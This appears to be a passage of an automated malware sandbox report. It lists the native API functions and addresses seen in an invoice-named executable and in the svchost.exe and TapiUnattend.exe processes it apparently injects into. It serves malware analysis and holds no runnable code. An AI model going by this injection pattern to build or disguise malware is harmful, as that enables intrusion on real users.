            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AD0 NtReadFile,1_2_03272AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F30 NtCreateSection,1_2_03272F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F60 NtCreateProcessEx,1_2_03272F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FA0 NtQuerySection,1_2_03272FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FB0 NtResumeThread,1_2_03272FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F90 NtProtectVirtualMemory,1_2_03272F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FE0 NtCreateFile,1_2_03272FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272E30 NtWriteVirtualMemory,1_2_03272E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272EA0 NtAdjustPrivilegesToken,1_2_03272EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272E80 NtReadVirtualMemory,1_2_03272E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272EE0 NtQueueApcThread,1_2_03272EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D30 NtUnmapViewOfSection,1_2_03272D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D00 NtSetInformationFile,1_2_03272D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D10 NtMapViewOfSection,1_2_03272D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DB0 NtEnumerateKey,1_2_03272DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DD0 NtDelayExecution,1_2_03272DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C00 NtQueryInformationProcess,1_2_03272C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C60 NtCreateKey,1_2_03272C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CA0 NtQueryInformationToken,1_2_03272CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CF0 NtOpenProcess,1_2_03272CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CC0 NtQueryVirtualMemory,1_2_03272CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273010 NtOpenDirectoryObject,1_2_03273010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273090 NtSetValueKey,1_2_03273090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032739B0 NtGetContextThread,1_2_032739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273D10 NtOpenProcessToken,1_2_03273D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273D70 NtOpenThread,1_2_03273D70
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03564340 NtSetContextThread,LdrInitializeThunk,6_2_03564340
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03564650 NtSuspendThread,LdrInitializeThunk,6_2_03564650
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562B60 NtClose,LdrInitializeThunk,6_2_03562B60
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03562BF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03562BE0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03562BA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562AD0 NtReadFile,LdrInitializeThunk,6_2_03562AD0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562AF0 NtWriteFile,LdrInitializeThunk,6_2_03562AF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562F30 NtCreateSection,LdrInitializeThunk,6_2_03562F30
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562FE0 NtCreateFile,LdrInitializeThunk,6_2_03562FE0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562FB0 NtResumeThread,LdrInitializeThunk,6_2_03562FB0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03562EE0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03562E80
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03562D10
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03562D30
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562DD0 NtDelayExecution,LdrInitializeThunk,6_2_03562DD0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03562DF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03562C70
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562C60 NtCreateKey,LdrInitializeThunk,6_2_03562C60
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03562CA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035635C0 NtCreateMutant,LdrInitializeThunk,6_2_035635C0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035639B0 NtGetContextThread,LdrInitializeThunk,6_2_035639B0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562B80 NtQueryInformationFile,6_2_03562B80
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562AB0 NtWaitForSingleObject,6_2_03562AB0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562F60 NtCreateProcessEx,6_2_03562F60
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562F90 NtProtectVirtualMemory,6_2_03562F90
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562FA0 NtQuerySection,6_2_03562FA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562E30 NtWriteVirtualMemory,6_2_03562E30
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562EA0 NtAdjustPrivilegesToken,6_2_03562EA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562D00 NtSetInformationFile,6_2_03562D00
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562DB0 NtEnumerateKey,6_2_03562DB0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562C00 NtQueryInformationProcess,6_2_03562C00
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562CC0 NtQueryVirtualMemory,6_2_03562CC0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03562CF0 NtOpenProcess,6_2_03562CF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03563010 NtOpenDirectoryObject,6_2_03563010
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03563090 NtSetValueKey,6_2_03563090
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03563D70 NtOpenThread,6_2_03563D70
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03563D10 NtOpenProcessToken,6_2_03563D10
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02C592A0 NtReadFile,6_2_02C592A0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02C593A0 NtDeleteFile,6_2_02C593A0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02C59130 NtCreateFile,6_2_02C59130
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02C59440 NtClose,6_2_02C59440
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02C595A0 NtAllocateVirtualMemory,6_2_02C595A0
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0044EB590_2_0044EB59
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0411B6480_2_0411B648
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004185D31_2_004185D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004100331_2_00410033
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E0B31_2_0040E0B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011B01_2_004011B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004022B01_2_004022B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042ECD31_2_0042ECD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025C01_2_004025C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FE131_2_0040FE13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004167C31_2_004167C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402FA01_2_00402FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004167BE1_2_004167BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA3521_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F01_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033003E61_2_033003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E02741_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C02C01_2_032C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032301001_2_03230100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA1181_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C81581_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F41A21_2_032F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033001AA1_2_033001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F81CC1_2_032F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D20001_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032407701_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032647501_2_03264750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323C7C01_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325C6E01_2_0325C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032405351_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033005911_2_03300591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E44201_2_032E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F24461_2_032F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EE4F61_2_032EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FAB401_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F6BD71_2_032F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA801_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032569621_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A01_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330A9A61_2_0330A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324A8401_2_0324A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032428401_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032268B81_2_032268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E8F01_2_0326E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03282F281_2_03282F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260F301_2_03260F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E2F301_2_032E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4F401_2_032B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BEFA01_2_032BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232FC81_2_03232FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FEE261_2_032FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240E591_2_03240E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252E901_2_03252E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FCE931_2_032FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FEEDB1_2_032FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324AD001_2_0324AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DCD1F1_2_032DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03258DBF1_2_03258DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323ADE01_2_0323ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240C001_2_03240C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0CB51_2_032E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230CF21_2_03230CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F132D1_2_032F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322D34C1_2_0322D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0328739A1_2_0328739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032452A01_2_032452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E12ED1_2_032E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325D2F01_2_0325D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B2C01_2_0325B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327516C1_2_0327516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322F1721_2_0322F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330B16B1_2_0330B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324B1B01_2_0324B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F70E91_2_032F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF0E01_2_032FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EF0CC1_2_032EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032470C01_2_032470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF7B01_2_032FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F16CC1_2_032F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F75711_2_032F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DD5B01_2_032DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF43F1_2_032FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032314601_2_03231460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFB761_2_032FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FB801_2_0325FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B5BF01_2_032B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327DBF91_2_0327DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B3A6C1_2_032B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFA491_2_032FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7A461_2_032F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DDAAC1_2_032DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03285AA01_2_03285AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E1AA31_2_032E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EDAC61_2_032EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D59101_2_032D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032499501_2_03249950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B9501_2_0325B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AD8001_2_032AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032438E01_2_032438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFF091_2_032FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFFB11_2_032FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03241F921_2_03241F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203FD21_2_03203FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203FD51_2_03203FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03249EB01_2_03249EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7D731_2_032F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03243D401_2_03243D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F1D5A1_2_032F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FDC01_2_0325FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B9C321_2_032B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFCF21_2_032FFCF2
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035EA3526_2_035EA352
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0353E3F06_2_0353E3F0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035F03E66_2_035F03E6
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035B02C06_2_035B02C0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035B81586_2_035B8158
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035CA1186_2_035CA118
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035201006_2_03520100
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035E81CC6_2_035E81CC
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035F01AA6_2_035F01AA
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035E41A26_2_035E41A2
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035C20006_2_035C2000
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035547506_2_03554750
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035307706_2_03530770
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0352C7C06_2_0352C7C0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0354C6E06_2_0354C6E0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035305356_2_03530535
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035F05916_2_035F0591
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035E24466_2_035E2446
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035D44206_2_035D4420
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035DE4F66_2_035DE4F6
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035EAB406_2_035EAB40
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035E6BD76_2_035E6BD7
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0352EA806_2_0352EA80
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035469626_2_03546962
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035329A06_2_035329A0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035FA9A66_2_035FA9A6
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0353A8406_2_0353A840
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035328406_2_03532840
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0355E8F06_2_0355E8F0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035168B86_2_035168B8
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035A4F406_2_035A4F40
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03550F306_2_03550F30
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035D2F306_2_035D2F30
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03572F286_2_03572F28
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03522FC86_2_03522FC8
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035AEFA06_2_035AEFA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03530E596_2_03530E59
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035EEE266_2_035EEE26
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035EEEDB6_2_035EEEDB
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03542E906_2_03542E90
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035ECE936_2_035ECE93
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035CCD1F6_2_035CCD1F
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0353AD006_2_0353AD00
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0352ADE06_2_0352ADE0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03548DBF6_2_03548DBF
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03530C006_2_03530C00
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03520CF26_2_03520CF2
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035D0CB56_2_035D0CB5
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0351D34C6_2_0351D34C
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035E132D6_2_035E132D
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0357739A6_2_0357739A
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0354B2C06_2_0354B2C0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0354D2F06_2_0354D2F0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035D12ED6_2_035D12ED
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035352A06_2_035352A0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0351F1726_2_0351F172
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035FB16B6_2_035FB16B
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0356516C6_2_0356516C
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0353B1B06_2_0353B1B0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035DF0CC6_2_035DF0CC
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035370C06_2_035370C0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035E70E96_2_035E70E9
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035EF0E06_2_035EF0E0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035EF7B06_2_035EF7B0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035756306_2_03575630
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035E16CC6_2_035E16CC
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_035E75716_2_035E7571
